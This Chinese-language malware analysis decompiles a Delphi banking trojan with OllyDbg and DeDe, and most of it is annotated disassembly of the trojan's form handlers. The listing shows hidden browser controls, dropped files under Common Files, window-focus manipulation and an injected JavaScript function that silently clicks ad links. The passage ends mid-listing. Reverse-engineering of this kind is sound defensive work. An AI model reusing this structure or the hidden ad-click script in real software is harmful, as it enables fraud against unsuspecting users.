Trojan-Banker.Win32.Banker (2)
使用spy对木马进程监视,发现不停地WM_TIMER消息,估计木马使用定时器监控ie的启动情况
木马使用delphi编写.
先使用ollydbg反编译Coilk.exe,发现
代码中有{985483CD-DCDE-4817-AF35-F17411836625}google,发现是Trojan-Banker病毒
代码中有TInterfacedObject,baidu,发现是delhpi类
再下载DeDe反编译,代码如下
Xaze.dll
unit Uqwt;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics,
Controls, Forms, Dialogs, StdCtrls
type
Tfrm_SSMoon=class(TForm)
ti_ZipMemory: TTimer;
Panel1: TPanel;
Webb1: TWebBrowser;
IdHTTP: TIdHTTP;
Webb: TWebBrowser;
webb2: TWebBrowser;
RzColorPicker1: TRzColorPicker;
GroupBox1: TGroupBox;
Edit1: TEdit;
Memo1: TMemo;
procedure FormCreate(Sender : TObject);
procedure WebbDocumentComplete(Sender : TObject);
procedure FormClose(Sender : TObject);
procedure FormActivate(Sender : TObject);
procedure ti_ZipMemoryTimer(Sender : TObject);
procedure webb2DocumentComplete(Sender : TObject);
procedure webb2NewWindow2(Sender : TObject);
procedure WebbNewWindow2(Sender : TObject);
procedure _PROC_004BA92A(Sender : TObject);
procedure _PROC_004BA961(Sender : TObject);
procedure _PROC_004BAA38(Sender : TObject);
procedure _PROC_004BAA95(Sender : TObject);
procedure _PROC_004BACE1(Sender : TObject);
procedure _PROC_004BAD08(Sender : TObject);
procedure _PROC_004BAD51(Sender : TObject);
procedure _PROC_004BB33D(Sender : TObject);
procedure _PROC_004BB5A5(Sender : TObject);
procedure _PROC_004BB800(Sender : TObject);
procedure _PROC_004BBD09(Sender : TObject);
procedure _PROC_004BBDE4(Sender : TObject);
procedure _PROC_004BC071(Sender : TObject);
procedure _PROC_004BC5C5(Sender : TObject);
procedure _PROC_004BC843(Sender : TObject);
procedure _PROC_004BC859(Sender : TObject);
procedure _PROC_004BCA70(Sender : TObject);
procedure _PROC_004BCE8D(Sender : TObject);
procedure _PROC_004BCF10(Sender : TObject);
procedure _PROC_004BD43C(Sender : TObject);
procedure _PROC_004BD598(Sender : TObject);
procedure _PROC_004BD60F(Sender : TObject);
procedure _PROC_004BD618(Sender : TObject);
private
{ Private declarations }
public
{ Public declarations }
end ;
var
frm_SSMoon: Tfrm_SSMoon;
{This file is generated by DeDe Ver 3.50.02 Copyright (c) 1999-2002 DaFixer}
implementation
{$R *.DFM}
procedure Tfrm_SSMoon.FormCreate(Sender : TObject);
begin
(*
004BBE20 55 push ebp
004BBE21 8BEC mov ebp, esp
004BBE23 33C9 xor ecx, ecx
004BBE25 51 push ecx
004BBE26 51 push ecx
004BBE27 51 push ecx
004BBE28 51 push ecx
004BBE29 51 push ecx
004BBE2A 51 push ecx
004BBE2B 51 push ecx
004BBE2C 51 push ecx
004BBE2D 53 push ebx
004BBE2E 56 push esi
004BBE2F 8BD8 mov ebx, eax
004BBE31 33C0 xor eax, eax
004BBE33 55 push ebp
* Possible String Reference to: '檠岕腚^[嬪]?
|
004BBE34 6806C04B00 push $004BC006
***** TRY
|
004BBE39 64FF30 push dword ptr fs:[eax]
004BBE3C 648920 mov fs:[eax], esp
004BBE3F 6AEC push $EC
004BBE41 8BC3 mov eax, ebx
|
004BBE43 E8583BF9FF call 0044F9A0
004BBE48 50 push eax
* Reference to: user32.GetWindowLongA()
|
004BBE49 E802C5F4FF call 00408350
004BBE4E 8BF0 mov esi, eax
004BBE50 81CE00000800 or esi, $00080000
004BBE56 81CE80000000 or esi, $00000080
004BBE5C 56 push esi
004BBE5D 6AEC push $EC
004BBE5F 8BC3 mov eax, ebx
|
004BBE61 E83A3BF9FF call 0044F9A0
004BBE66 50 push eax
* Reference to: user32.SetWindowLongA()
|
004BBE67 E834C7F4FF call 004085A0
004BBE6C 6A02 push $02
004BBE6E 6A03 push $03
004BBE70 6A00 push $00
004BBE72 8BC3 mov eax, ebx
|
004BBE74 E8273BF9FF call 0044F9A0
004BBE79 50 push eax
004BBE7A A12C654C00 mov eax, dword ptr [$004C652C]
004BBE7F 8B00 mov eax, [eax]
004BBE81 FFD0 call eax
004BBE83 8D45FC lea eax, [ebp-$04]
* Reference to : TWebBrowser._PROC_004704D0()
|
004BBE86 E84546FBFF call 004704D0
004BBE8B 8B1568624C00 mov edx, [$004C6268]
004BBE91 8802 mov [edx], al
004BBE93 C60578DD4C0000 mov byte ptr [$004CDD78], $00
004BBE9A C60579DD4C0000 mov byte ptr [$004CDD79], $00
004BBEA1 8D45FC lea eax, [ebp-$04]
004BBEA4 50 push eax
004BBEA5 8D55F4 lea edx, [ebp-$0C]
004BBEA8 33C0 xor eax, eax
|
004BBEAA E8CD74F4FF call 0040337C
004BBEAF 8B45F4 mov eax, [ebp-$0C]
004BBEB2 8D55F8 lea edx, [ebp-$08]
|
004BBEB5 E876EAF4FF call 0040A930
004BBEBA 8B45F8 mov eax, [ebp-$08]
004BBEBD B903000000 mov ecx, $00000003
004BBEC2 BA01000000 mov edx, $00000001
|
004BBEC7 E8209BF4FF call 004059EC
004BBECC A168624C00 mov eax, dword ptr [$004C6268]
004BBED1 803806 cmp byte ptr [eax], $06
004BBED4 740A jz 004BBEE0
004BBED6 A168624C00 mov eax, dword ptr [$004C6268]
004BBEDB 803807 cmp byte ptr [eax], $07
004BBEDE 7527 jnz 004BBF07
004BBEE0 8D45EC lea eax, [ebp-$14]
* Reference to : TWebBrowser._PROC_00470A04()
|
004BBEE3 E81C4BFBFF call 00470A04
004BBEE8 8B45EC mov eax, [ebp-$14]
004BBEEB 8D55F0 lea edx, [ebp-$10]
|
004BBEEE E83DEAF4FF call 0040A930
004BBEF3 8B55F0 mov edx, [ebp-$10]
004BBEF6 A148624C00 mov eax, dword ptr [$004C6248]
* Possible String Reference to: 'MSPat.XML'
|
004BBEFB B91CC04B00 mov ecx, $004BC01C
|
004BBF00 E80799F4FF call 0040580C
004BBF05 EB1C jmp 004BBF23
004BBF07 FF75FC push dword ptr [ebp-$04]
* Possible String Reference to: 'Program Files\Common Files\System\O
| le DB\'
|
004BBF0A 6830C04B00 push $004BC030
* Possible String Reference to: 'MSPat.XML'
|
004BBF0F 681CC04B00 push $004BC01C
004BBF14 A148624C00 mov eax, dword ptr [$004C6248]
004BBF19 BA03000000 mov edx, $00000003
|
004BBF1E E86599F4FF call 00405888
004BBF23 A168624C00 mov eax, dword ptr [$004C6268]
004BBF28 803806 cmp byte ptr [eax], $06
004BBF2B 740A jz 004BBF37
004BBF2D A168624C00 mov eax, dword ptr [$004C6268]
004BBF32 803807 cmp byte ptr [eax], $07
004BBF35 7527 jnz 004BBF5E
004BBF37 8D45E4 lea eax, [ebp-$1C]
* Reference to : TWebBrowser._PROC_00470A04()
|
004BBF3A E8C54AFBFF call 00470A04
004BBF3F 8B45E4 mov eax, [ebp-$1C]
004BBF42 8D55E8 lea edx, [ebp-$18]
|
004BBF45 E8E6E9F4FF call 0040A930
004BBF4A 8B55E8 mov edx, [ebp-$18]
004BBF4D A1D8644C00 mov eax, dword ptr [$004C64D8]
* Possible String Reference to: 'msadotb.htm'
|
004BBF52 B964C04B00 mov ecx, $004BC064
|
004BBF57 E8B098F4FF call 0040580C
004BBF5C EB24 jmp 004BBF82
004BBF5E 8D45E0 lea eax, [ebp-$20]
* Reference to : TWebBrowser._PROC_004709B0()
|
004BBF61 E84A4AFBFF call 004709B0
004BBF66 FF75E0 push dword ptr [ebp-$20]
* Possible String Reference to: 'Program Files\Common Files\System\O
| le DB\'
|
004BBF69 6830C04B00 push $004BC030
* Possible String Reference to: 'msadotb.htm'
|
004BBF6E 6864C04B00 push $004BC064
004BBF73 A1D8644C00 mov eax, dword ptr [$004C64D8]
004BBF78 BA03000000 mov edx, $00000003
|
004BBF7D E80699F4FF call 00405888
004BBF82 A148624C00 mov eax, dword ptr [$004C6248]
004BBF87 8B00 mov eax, [eax]
004BBF89 33D2 xor edx, edx
|
004BBF8B E8E0FBFEFF call 004ABB70
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BBF90 898388030000 mov [ebx+$0388], eax
004BBF96 8BC3 mov eax, ebx
|
004BBF98 E8D3000000 call 004BC070
004BBF9D 8BC3 mov eax, ebx
* Reference to : Tfrm_SSMoon._PROC_004BCA70()
|
004BBF9F E8CC0A0000 call 004BCA70
004BBFA4 B201 mov dl, $01
* Reference to class TStringList
|
004BBFA6 A1A8AA4100 mov eax, dword ptr [$0041AAA8]
|
004BBFAB E86885F4FF call 00404518
* Reference to field Tfrm_SSMoon.OFFS_038C
|
004BBFB0 89838C030000 mov [ebx+$038C], eax
004BBFB6 B201 mov dl, $01
* Reference to class TStringList
|
004BBFB8 A1A8AA4100 mov eax, dword ptr [$0041AAA8]
|
004BBFBD E85685F4FF call 00404518
* Reference to field Tfrm_SSMoon.OFFS_0390
|
004BBFC2 898390030000 mov [ebx+$0390], eax
004BBFC8 8BC3 mov eax, ebx
|
004BBFCA E8D139F9FF call 0044F9A0
004BBFCF 8BC8 mov ecx, eax
004BBFD1 B201 mov dl, $01
* Reference to class TConntecInternetThread
|
004BBFD3 A1141C4700 mov eax, dword ptr [$00471C14]
|
004BBFD8 E8A35CFBFF call 00471C80
* Reference to field Tfrm_SSMoon.OFFS_0394
|
004BBFDD 898394030000 mov [ebx+$0394], eax
004BBFE3 A158674C00 mov eax, dword ptr [$004C6758]
004BBFE8 C60000 mov byte ptr [eax], $00
004BBFEB 33C0 xor eax, eax
004BBFED 5A pop edx
004BBFEE 59 pop ecx
004BBFEF 59 pop ecx
004BBFF0 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '^[嬪]?
|
004BBFF3 680DC04B00 push $004BC00D
004BBFF8 8D45E0 lea eax, [ebp-$20]
004BBFFB BA08000000 mov edx, $00000008
|
004BC000 E81395F4FF call 00405518
004BC005 C3 ret
|
004BC006 E9D18CF4FF jmp 00404CDC
004BC00B EBEB jmp 004BBFF8
****** END
|
004BC00D 5E pop esi
004BC00E 5B pop ebx
004BC00F 8BE5 mov esp, ebp
004BC011 5D pop ebp
004BC012 C3 ret
*)
end;
procedure Tfrm_SSMoon.WebbDocumentComplete(Sender : TObject);
begin
(*
004BC668 55 push ebp
004BC669 8BEC mov ebp, esp
004BC66B 6A00 push $00
004BC66D 6A00 push $00
004BC66F 6A00 push $00
004BC671 6A00 push $00
004BC673 6A00 push $00
004BC675 6A00 push $00
004BC677 6A00 push $00
004BC679 53 push ebx
004BC67A 56 push esi
004BC67B 8BF1 mov esi, ecx
004BC67D 8BD8 mov ebx, eax
004BC67F 33C0 xor eax, eax
004BC681 55 push ebp
004BC682 6834C84B00 push $004BC834
***** TRY
|
004BC687 64FF30 push dword ptr fs:[eax]
004BC68A 648920 mov fs:[eax], esp
004BC68D 803D78DD4C0000 cmp byte ptr [$004CDD78], $00
004BC694 0F8564010000 jnz 004BC7FE
004BC69A 8D55F4 lea edx, [ebp-$0C]
* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC69D 8B8370030000 mov eax, [ebx+$0370]
* Reference to : TWebBrowser._PROC_00470444()
|
004BC6A3 E89C3DFBFF call 00470444
004BC6A8 3B75F4 cmp esi, [ebp-$0C]
004BC6AB 0F854D010000 jnz 004BC7FE
004BC6B1 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BC6B6 83B88803000000 cmp dword ptr [eax+$0388], +$00
004BC6BD 0F843B010000 jz 004BC7FE
004BC6C3 C60578DD4C0001 mov byte ptr [$004CDD78], $01
004BC6CA 8D4DF0 lea ecx, [ebp-$10]
* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC6CD 8B8370030000 mov eax, [ebx+$0370]
004BC6D3 BACB000000 mov edx, $000000CB
* Reference to : TOleControl._PROC_0046CE4C()
|
004BC6D8 E86F07FBFF call 0046CE4C
004BC6DD 8B55F0 mov edx, [ebp-$10]
004BC6E0 B860DD4C00 mov eax, $004CDD60
004BC6E5 B944C84B00 mov ecx, $004BC844
|
004BC6EA E891ABF4FF call 00407280
004BC6EF 8D45EC lea eax, [ebp-$14]
|
004BC6F2 E845ABF4FF call 0040723C
004BC6F7 50 push eax
004BC6F8 A160DD4C00 mov eax, dword ptr [$004CDD60]
004BC6FD 50 push eax
004BC6FE 8B00 mov eax, [eax]
004BC700 FF90B0010000 call dword ptr [eax+$01B0]
|
004BC706 E841ACF4FF call 0040734C
004BC70B 8B55EC mov edx, [ebp-$14]
004BC70E B864DD4C00 mov eax, $004CDD64
004BC713 B954C84B00 mov ecx, $004BC854
|
004BC718 E863ABF4FF call 00407280
004BC71D B201 mov dl, $01
* Reference to class TMemoryStream
|
004BC71F A1ACAD4100 mov eax, dword ptr [$0041ADAC]
|
004BC724 E8EF7DF4FF call 00404518
004BC729 8945F8 mov [ebp-$08], eax
004BC72C B201 mov dl, $01
* Reference to class TStringList
|
004BC72E A1A8AA4100 mov eax, dword ptr [$0041AAA8]
|
004BC733 E8E07DF4FF call 00404518
004BC738 8945FC mov [ebp-$04], eax
004BC73B 33C0 xor eax, eax
004BC73D 55 push ebp
004BC73E 68F7C74B00 push $004BC7F7
***** TRY
|
004BC743 64FF30 push dword ptr fs:[eax]
004BC746 648920 mov fs:[eax], esp
* Possible String Reference to: '<html><body><a id="adid" href="#" t
| arget="_blank"></a>'
|
004BC749 BA6CC84B00 mov edx, $004BC86C
004BC74E 8B45FC mov eax, [ebp-$04]
004BC751 8B08 mov ecx, [eax]
* Possible reference to virtual method TStringList.OFFS_38
|
004BC753 FF5138 call dword ptr [ecx+$38]
* Possible String Reference to: '<script language="javascript">'
|
004BC756 BAACC84B00 mov edx, $004BC8AC
004BC75B 8B45FC mov eax, [ebp-$04]
004BC75E 8B08 mov ecx, [eax]
* Possible reference to virtual method TStringList.OFFS_38
|
004BC760 FF5138 call dword ptr [ecx+$38]
* Possible String Reference to: 'function ClickAD(adcode){lnk = docu
| ment.getElementById("adid"); if(lnk
| !=null){lnk.href=adcode;lnk.click()
| ;}}'
|
004BC763 BAD4C84B00 mov edx, $004BC8D4
004BC768 8B45FC mov eax, [ebp-$04]
004BC76B 8B08 mov ecx, [eax]
* Possible reference to virtual method TStringList.OFFS_38
|
004BC76D FF5138 call dword ptr [ecx+$38]
* Possible String Reference to: '</Script></body></html>'
|
004BC770 BA4CC94B00 mov edx, $004BC94C
004BC775 8B45FC mov eax, [ebp-$04]
004BC778 8B08 mov ecx, [eax]
* Possible reference to virtual method TStringList.OFFS_38
|
004BC77A FF5138 call dword ptr [ecx+$38]
004BC77D 8B55F8 mov edx, [ebp-$08]
004BC780 8B45FC mov eax, [ebp-$04]
004BC783 8B08 mov ecx, [eax]
* Possible reference to virtual method TStringList.OFFS_78
|
004BC785 FF5178 call dword ptr [ecx+$78]
004BC788 6A00 push $00
004BC78A 6A00 push $00
004BC78C 8B45F8 mov eax, [ebp-$08]
|
004BC78F E8842EF6FF call 0041F618
004BC794 6A00 push $00
004BC796 8B4DF8 mov ecx, [ebp-$08]
004BC799 B201 mov dl, $01
* Reference to class TStreamAdapter
|
004BC79B A13CB04100 mov eax, dword ptr [$0041B03C]
|
004BC7A0 E80B82F6FF call 004249B0
004BC7A5 85C0 test eax, eax
004BC7A7 7403 jz 004BC7AC
004BC7A9 83E8EC sub eax, -$14
004BC7AC 50 push eax
004BC7AD 8D4DE4 lea ecx, [ebp-$1C]
* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC7B0 8B8370030000 mov eax, [ebx+$0370]
004BC7B6 BACB000000 mov edx, $000000CB
* Reference to : TOleControl._PROC_0046CE4C()
|
004BC7BB E88C06FBFF call 0046CE4C
004BC7C0 8B55E4 mov edx, [ebp-$1C]
004BC7C3 8D45E8 lea eax, [ebp-$18]
004BC7C6 B964C94B00 mov ecx, $004BC964
|
004BC7CB E8B0AAF4FF call 00407280
004BC7D0 8B45E8 mov eax, [ebp-$18]
004BC7D3 50 push eax
004BC7D4 8B00 mov eax, [eax]
004BC7D6 FF5014 call dword ptr [eax+$14]
004BC7D9 33C0 xor eax, eax
004BC7DB 5A pop edx
004BC7DC 59 pop ecx
004BC7DD 59 pop ecx
004BC7DE 648910 mov fs:[eax], edx
****** FINALLY
|
004BC7E1 68FEC74B00 push $004BC7FE
004BC7E6 8B45F8 mov eax, [ebp-$08]
|
004BC7E9 E85A7DF4FF call 00404548
004BC7EE 8B45FC mov eax, [ebp-$04]
|
004BC7F1 E8527DF4FF call 00404548
004BC7F6 C3 ret
|
004BC7F7 E9E084F4FF jmp 00404CDC
004BC7FC EBE8 jmp 004BC7E6
****** END
|
004BC7FE 33C0 xor eax, eax
004BC800 5A pop edx
004BC801 59 pop ecx
004BC802 59 pop ecx
004BC803 648910 mov fs:[eax], edx
****** FINALLY
|
004BC806 683BC84B00 push $004BC83B
004BC80B 8D45E4 lea eax, [ebp-$1C]
|
004BC80E E829AAF4FF call 0040723C
004BC813 8D45E8 lea eax, [ebp-$18]
|
004BC816 E821AAF4FF call 0040723C
004BC81B 8D45EC lea eax, [ebp-$14]
|
004BC81E E819AAF4FF call 0040723C
004BC823 8D45F0 lea eax, [ebp-$10]
|
004BC826 E811AAF4FF call 0040723C
004BC82B 8D45F4 lea eax, [ebp-$0C]
|
004BC82E E809AAF4FF call 0040723C
004BC833 C3 ret
|
004BC834 E9A384F4FF jmp 00404CDC
004BC839 EBD0 jmp 004BC80B
****** END
|
004BC83B 5E pop esi
004BC83C 5B pop ebx
004BC83D 8BE5 mov esp, ebp
004BC83F 5D pop ebp
004BC840 C20400 ret $0004
*)
end;
procedure Tfrm_SSMoon.FormClose(Sender : TObject);
begin
(*
004BCA40 53 push ebx
004BCA41 8BD8 mov ebx, eax
004BCA43 C60102 mov byte ptr [ecx], $02
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BCA46 8B8388030000 mov eax, [ebx+$0388]
|
004BCA4C E8F77AF4FF call 00404548
* Reference to field Tfrm_SSMoon.OFFS_038C
|
004BCA51 8B838C030000 mov eax, [ebx+$038C]
|
004BCA57 E8EC7AF4FF call 00404548
* Reference to field Tfrm_SSMoon.OFFS_0390
|
004BCA5C 8B8390030000 mov eax, [ebx+$0390]
|
004BCA62 E8E17AF4FF call 00404548
004BCA67 33C0 xor eax, eax
* Reference to GlobalVar_004CDD54
|
004BCA69 A354DD4C00 mov dword ptr [$004CDD54], eax
004BCA6E 5B pop ebx
004BCA6F C3 ret
*)
end;
procedure Tfrm_SSMoon.FormActivate(Sender : TObject);
begin
(*
* Reference to field Tfrm_SSMoon.OFFS_004C
|
004BD1AC 8B504C mov edx, [eax+$4C]
004BD1AF 8BCA mov ecx, edx
004BD1B1 F7DA neg edx
* Reference to : TGlassFrame._PROC_00463270()
|
004BD1B3 E8B860FAFF call 00463270
004BD1B8 C3 ret
*)
end;
procedure Tfrm_SSMoon.ti_ZipMemoryTimer(Sender : TObject);
begin
(*
004BD1BC 55 push ebp
004BD1BD 8BEC mov ebp, esp
004BD1BF 51 push ecx
004BD1C0 53 push ebx
004BD1C1 56 push esi
004BD1C2 57 push edi
004BD1C3 8945FC mov [ebp-$04], eax
004BD1C6 833D58DD4C0000 cmp dword ptr [$004CDD58], +$00
004BD1CD 7631 jbe 004BD200
004BD1CF 33C0 xor eax, eax
004BD1D1 55 push ebp
004BD1D2 68F6D14B00 push $004BD1F6
***** TRY
|
004BD1D7 64FF30 push dword ptr fs:[eax]
004BD1DA 648920 mov fs:[eax], esp
004BD1DD 6AFF push $FF
004BD1DF 6AFF push $FF
004BD1E1 A158DD4C00 mov eax, dword ptr [$004CDD58]
004BD1E6 50 push eax
* Reference to: kernel32.SetProcessWorkingSetSize()
|
004BD1E7 E8D4ABF4FF call 00407DC0
004BD1EC 33C0 xor eax, eax
004BD1EE 5A pop edx
004BD1EF 59 pop ecx
004BD1F0 59 pop ecx
004BD1F1 648910 mov fs:[eax], edx
004BD1F4 EB0A jmp 004BD200
|
004BD1F6 E92D78F4FF jmp 00404A28
|
004BD1FB E8387CF4FF call 00404E38
****** END
|
004BD200 8B45FC mov eax, [ebp-$04]
* Reference to control Tfrm_SSMoon.ti_ZipMemory : TTimer
|
004BD203 8B8060030000 mov eax, [eax+$0360]
004BD209 BA40771B00 mov edx, $001B7740
* Reference to : TPanel._PROC_00437CDC()
|
004BD20E E8C9AAF7FF call 00437CDC
004BD213 5F pop edi
004BD214 5E pop esi
004BD215 5B pop ebx
004BD216 59 pop ecx
004BD217 5D pop ebp
004BD218 C3 ret
*)
end;
procedure Tfrm_SSMoon.webb2DocumentComplete(Sender : TObject);
begin
(*
004BD21C 55 push ebp
004BD21D 8BEC mov ebp, esp
004BD21F 6A00 push $00
004BD221 6A00 push $00
004BD223 6A00 push $00
004BD225 6A00 push $00
004BD227 6A00 push $00
004BD229 53 push ebx
004BD22A 56 push esi
004BD22B 8BF1 mov esi, ecx
004BD22D 8BD8 mov ebx, eax
004BD22F 33C0 xor eax, eax
004BD231 55 push ebp
004BD232 6844D34B00 push $004BD344
***** TRY
|
004BD237 64FF30 push dword ptr fs:[eax]
004BD23A 648920 mov fs:[eax], esp
004BD23D 803D79DD4C0000 cmp byte ptr [$004CDD79], $00
004BD244 0F85C7000000 jnz 004BD311
004BD24A 8D4DFC lea ecx, [ebp-$04]
004BD24D BAC8000000 mov edx, $000000C8
* Reference to control Tfrm_SSMoon.webb2 : TWebBrowser
|
004BD252 8B8374030000 mov eax, [ebx+$0374]
* Reference to : TOleControl._PROC_0046CE4C()
|
004BD258 E8EFFBFAFF call 0046CE4C
004BD25D 3B75FC cmp esi, [ebp-$04]
004BD260 0F85AB000000 jnz 004BD311
004BD266 C60579DD4C0001 mov byte ptr [$004CDD79], $01
004BD26D B85CDD4C00 mov eax, $004CDD5C
|
004BD272 E8C59FF4FF call 0040723C
004BD277 A154DD4C00 mov eax, dword ptr [$004CDD54]
|
004BD27C E81F27F9FF call 0044F9A0
004BD281 50 push eax
* Reference to: user32.SetForegroundWindow()
|
004BD282 E8C1B2F4FF call 00408548
004BD287 8D45F8 lea eax, [ebp-$08]
|
004BD28A E8AD9FF4FF call 0040723C
004BD28F 50 push eax
004BD290 8D4DF4 lea ecx, [ebp-$0C]
004BD293 A154DD4C00 mov eax, dword ptr [$004CDD54]
* Reference to control webb2 : TWebBrowser
|
004BD298 8B8074030000 mov eax, [eax+$0374]
004BD29E BACB000000 mov edx, $000000CB
* Reference to : TOleControl._PROC_0046CE4C()
|
004BD2A3 E8A4FBFAFF call 0046CE4C
004BD2A8 8B45F4 mov eax, [ebp-$0C]
004BD2AB 50 push eax
004BD2AC 8B00 mov eax, [eax]
004BD2AE FF90B0010000 call dword ptr [eax+$01B0]
|
004BD2B4 E893A0F4FF call 0040734C
004BD2B9 8B45F8 mov eax, [ebp-$08]
004BD2BC 50 push eax
004BD2BD 8B00 mov eax, [eax]
004BD2BF FF90EC000000 call dword ptr [eax+$00EC]
|
004BD2C5 E882A0F4FF call 0040734C
* Possible String Reference to: '{TAB '
|
004BD2CA 685CD34B00 push $004BD35C
004BD2CF 8D55EC lea edx, [ebp-$14]
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BD2D2 8B8388030000 mov eax, [ebx+$0388]
004BD2D8 8B402C mov eax, [eax+$2C]
|
004BD2DB E82CCFF4FF call 0040A20C
004BD2E0 FF75EC push dword ptr [ebp-$14]
004BD2E3 686CD34B00 push $004BD36C
004BD2E8 8D45F0 lea eax, [ebp-$10]
004BD2EB BA03000000 mov edx, $00000003
|
004BD2F0 E89385F4FF call 00405888
004BD2F5 8B45F0 mov eax, [ebp-$10]
|
004BD2F8 E88786F4FF call 00405984
004BD2FD 33D2 xor edx, edx
|
004BD2FF E8CC0AFFFF call 004ADDD0
004BD304 A160624C00 mov eax, dword ptr [$004C6260]
004BD309 8B00 mov eax, [eax]
004BD30B 50 push eax
* Reference to: user32.SetForegroundWindow()
|
004BD30C E837B2F4FF call 00408548
004BD311 33C0 xor eax, eax
004BD313 5A pop edx
004BD314 59 pop ecx
004BD315 59 pop ecx
004BD316 648910 mov fs:[eax], edx
****** FINALLY
|
004BD319 684BD34B00 push $004BD34B
004BD31E 8D45EC lea eax, [ebp-$14]
004BD321 BA02000000 mov edx, $00000002
|
004BD326 E8ED81F4FF call 00405518
004BD32B 8D45F4 lea eax, [ebp-$0C]
|
004BD32E E8099FF4FF call 0040723C
004BD333 8D45F8 lea eax, [ebp-$08]
|
004BD336 E8019FF4FF call 0040723C
004BD33B 8D45FC lea eax, [ebp-$04]
|
004BD33E E8F99EF4FF call 0040723C
004BD343 C3 ret
|
004BD344 E99379F4FF jmp 00404CDC
004BD349 EBD3 jmp 004BD31E
****** END
|
004BD34B 5E pop esi
004BD34C 5B pop ebx
004BD34D 8BE5 mov esp, ebp
004BD34F 5D pop ebp
004BD350 C20400 ret $0004
*)
end;
procedure Tfrm_SSMoon.webb2NewWindow2(Sender : TObject);
begin
(*
004BD370 55 push ebp
004BD371 8BEC mov ebp, esp
004BD373 6A00 push $00
004BD375 6A00 push $00
004BD377 53 push ebx
004BD378 56 push esi
004BD379 57 push edi
004BD37A 8BF1 mov esi, ecx
004BD37C 8BD8 mov ebx, eax
004BD37E 33C0 xor eax, eax
004BD380 55 push ebp
004BD381 682AD44B00 push $004BD42A
***** TRY
|
004BD386 64FF30 push dword ptr fs:[eax]
004BD389 648920 mov fs:[eax], esp
004BD38C 33C0 xor eax, eax
004BD38E 55 push ebp
004BD38F 68F7D34B00 push $004BD3F7
***** TRY
|
004BD394 64FF30 push dword ptr fs:[eax]
004BD397 648920 mov fs:[eax], esp
004BD39A 833D5CDD4C0000 cmp dword ptr [$004CDD5C], +$00
004BD3A1 7425 jz 004BD3C8
004BD3A3 8D45FC lea eax, [ebp-$04]
|
004BD3A6 E8919EF4FF call 0040723C
004BD3AB 50 push eax
004BD3AC A15CDD4C00 mov eax, dword ptr [$004CDD5C]
004BD3B1 50 push eax
004BD3B2 8B00 mov eax, [eax]
004BD3B4 FF503C call dword ptr [eax+$3C]
|
004BD3B7 E8909FF4FF call 0040734C
004BD3BC 8B55FC mov edx, [ebp-$04]
004BD3BF 8BC6 mov eax, esi
|
004BD3C1 E88E9EF4FF call 00407254
004BD3C6 EB1D jmp 004BD3E5
004BD3C8 8D4DF8 lea ecx, [ebp-$08]
* Reference to control Tfrm_SSMoon.Webb1 : TWebBrowser
|
004BD3CB 8B8368030000 mov eax, [ebx+$0368]
004BD3D1 BAC8000000 mov edx, $000000C8
* Reference to : TOleControl._PROC_0046CE4C()
|
004BD3D6 E871FAFAFF call 0046CE4C
004BD3DB 8B55F8 mov edx, [ebp-$08]
004BD3DE 8BC6 mov eax, esi
|
004BD3E0 E86F9EF4FF call 00407254
004BD3E5 8B4508 mov eax, [ebp+$08]
004BD3E8 66C7000000 mov word ptr [eax], $0000
004BD3ED 33C0 xor eax, eax
004BD3EF 5A pop edx
004BD3F0 59 pop ecx
004BD3F1 59 pop ecx
004BD3F2 648910 mov fs:[eax], edx
004BD3F5 EB12 jmp 004BD409
|
004BD3F7 E92C76F4FF jmp 00404A28
004BD3FC 8B4508 mov eax, [ebp+$08]
004BD3FF 66C700FFFF mov word ptr [eax], $FFFF
|
004BD404 E82F7AF4FF call 00404E38
****** END
|
004BD409 33C0 xor eax, eax
004BD40B 5A pop edx
004BD40C 59 pop ecx
004BD40D 59 pop ecx
004BD40E 648910 mov fs:[eax], edx
****** FINALLY
|
004BD411 6831D44B00 push $004BD431
004BD416 8D45F8 lea eax, [ebp-$08]
* Reference to object IDispatch
|
004BD419 8B15B8114000 mov edx, [$004011B8]
004BD41F B902000000 mov ecx, $00000002
|
004BD424 E80F8DF4FF call 00406138
004BD429 C3 ret
|
004BD42A E9AD78F4FF jmp 00404CDC
004BD42F EBE5 jmp 004BD416
****** END
|
004BD431 5F pop edi
004BD432 5E pop esi
004BD433 5B pop ebx
004BD434 59 pop ecx
004BD435 59 pop ecx
004BD436 5D pop ebp
004BD437 C20400 ret $0004
*)
end;
procedure Tfrm_SSMoon.WebbNewWindow2(Sender : TObject);
begin
(*
004BC974 55 push ebp
004BC975 8BEC mov ebp, esp
004BC977 6A00 push $00
004BC979 6A00 push $00
004BC97B 53 push ebx
004BC97C 56 push esi
004BC97D 57 push edi
004BC97E 8BF1 mov esi, ecx
004BC980 8BD8 mov ebx, eax
004BC982 33C0 xor eax, eax
004BC984 55 push ebp
004BC985 682ECA4B00 push $004BCA2E
***** TRY
|
004BC98A 64FF30 push dword ptr fs:[eax]
004BC98D 648920 mov fs:[eax], esp
004BC990 33C0 xor eax, eax
004BC992 55 push ebp
004BC993 68FBC94B00 push $004BC9FB
***** TRY
|
004BC998 64FF30 push dword ptr fs:[eax]
004BC99B 648920 mov fs:[eax], esp
004BC99E 833D5CDD4C0000 cmp dword ptr [$004CDD5C], +$00
004BC9A5 7425 jz 004BC9CC
004BC9A7 8D45FC lea eax, [ebp-$04]
|
004BC9AA E88DA8F4FF call 0040723C
004BC9AF 50 push eax
004BC9B0 A15CDD4C00 mov eax, dword ptr [$004CDD5C]
004BC9B5 50 push eax
004BC9B6 8B00 mov eax, [eax]
004BC9B8 FF503C call dword ptr [eax+$3C]
|
004BC9BB E88CA9F4FF call 0040734C
004BC9C0 8B55FC mov edx, [ebp-$04]
004BC9C3 8BC6 mov eax, esi
|
004BC9C5 E88AA8F4FF call 00407254
004BC9CA EB1D jmp 004BC9E9
004BC9CC 8D4DF8 lea ecx, [ebp-$08]
* Reference to control Tfrm_SSMoon.Webb1 : TWebBrowser
|
004BC9CF 8B8368030000 mov eax, [ebx+$0368]
004BC9D5 BAC8000000 mov edx, $000000C8
* Reference to : TOleControl._PROC_0046CE4C()
|
004BC9DA E86D04FBFF call 0046CE4C
004BC9DF 8B55F8 mov edx, [ebp-$08]
